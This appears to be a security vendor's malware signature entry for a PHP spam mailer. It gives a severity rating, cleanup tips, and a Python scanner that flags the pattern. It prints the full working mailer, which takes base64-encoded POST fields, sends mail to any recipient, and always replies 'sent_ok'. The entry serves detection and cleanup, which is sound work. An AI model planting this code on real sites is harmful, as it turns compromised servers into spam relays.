
A simple yet powerful PHP mailer that is driven through the POST method of the HTTP protocol.
It requires four $_POST variables to work, which makes requests to its URL easy for an attacker to script, and it can be turned into a mass spam tool for malicious e-mail campaigns.

Severity

MEDIUM

Affecting

This malicious code affects any vulnerable or compromised website that is configured to interpret the scripting language (PHP).

Cleanup

Inspect your site's files, especially theme-related ones, for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.

Dump

// Each of the four POST fields is base64-decoded. If any field is
// missing, the script prints "sent_ok" and exits.
if(isset($_POST["mailto"]))
    $MailTo = base64_decode($_POST["mailto"]);
else
{
    echo "sent_ok";
    exit;
}
if(isset($_POST["msgheader"]))
    $MessageHeader = base64_decode($_POST["msgheader"]);
else
{
    echo "sent_ok";
    exit;
}
if(isset($_POST["msgbody"]))
    $MessageBody = base64_decode($_POST["msgbody"]);
else
{
    echo "sent_ok";
    exit;
}
if(isset($_POST["msgsubject"]))
    $MessageSubject = base64_decode($_POST["msgsubject"]);
else
{
    echo "sent_ok";
    exit;
}
// Recipient, subject, body and headers all come from the request.
// The response is "sent_ok" whether or not mail() succeeded.
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader))
    echo "sent_ok";
else
    echo "sent_ok";
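
For the cleanup step, the following is an added example (not part of the original signature entry or of any vendor tooling) that flags PHP files in which the recipient passed to mail() was assigned from base64_decode($_POST[...]), the structure seen in the dump above. The function names, file extensions and sample strings are assumptions made for this illustration.

```python
import os
import re

# $Var = base64_decode($_POST["field"]);  -> remember Var and the POST field
TAINT_RE = re.compile(
    r'\$(\w+)\s*=\s*(?i:base64_decode)\s*\(\s*\$_POST'
    r'\s*\[\s*["\'](\w+)["\']\s*\]\s*\)')
# Bare mail(...) call; skips wp_mail(), $obj->mail() and Class::mail()
MAIL_RE = re.compile(r'(?<![\w>$:])(?i:mail)\s*\(([^()]*)\)')

def find_post_mailer(php_source):
    """Return a finding if mail()'s recipient is a base64-decoded POST field."""
    tainted = {m.group(1): m.group(2) for m in TAINT_RE.finditer(php_source)}
    for call in MAIL_RE.finditer(php_source):
        args = [a.strip() for a in call.group(1).split(",")]
        names = [a[1:] if a.startswith("$") else None for a in args]
        # Remote control of the first argument (the recipient) is what turns
        # a script into a relay, so a finding requires it.
        if names[0] in tainted:
            fields = [tainted[n] for n in names if n in tainted]
            line = php_source.count("\n", 0, call.start()) + 1
            return {"line": line, "post_fields": fields}
    return None

def scan_tree(root):
    """Yield (path, finding) for each PHP file under root that matches."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml", ".inc")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    finding = find_post_mailer(fh.read())
                if finding:
                    yield path, finding

# Constructed inputs: a shortened copy of the dumped mailer and a benign form.
SAMPLE = '''<?php
$MailTo = base64_decode($_POST["mailto"]);
$MessageSubject = base64_decode($_POST["msgsubject"]);
if(mail($MailTo,$MessageSubject,"body"))
echo "sent_ok";
'''
BENIGN = '''<?php
$body = strip_tags($_POST["message"]);
mail("owner@example.com", "Contact form", $body);
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE), ("benign", BENIGN)):
        print(label, find_post_mailer(src))
```

The pattern matches only the plain form shown in the dump, so a hit is a lead for manual review; encoded or obfuscated variants still need the broader inspection described under Cleanup.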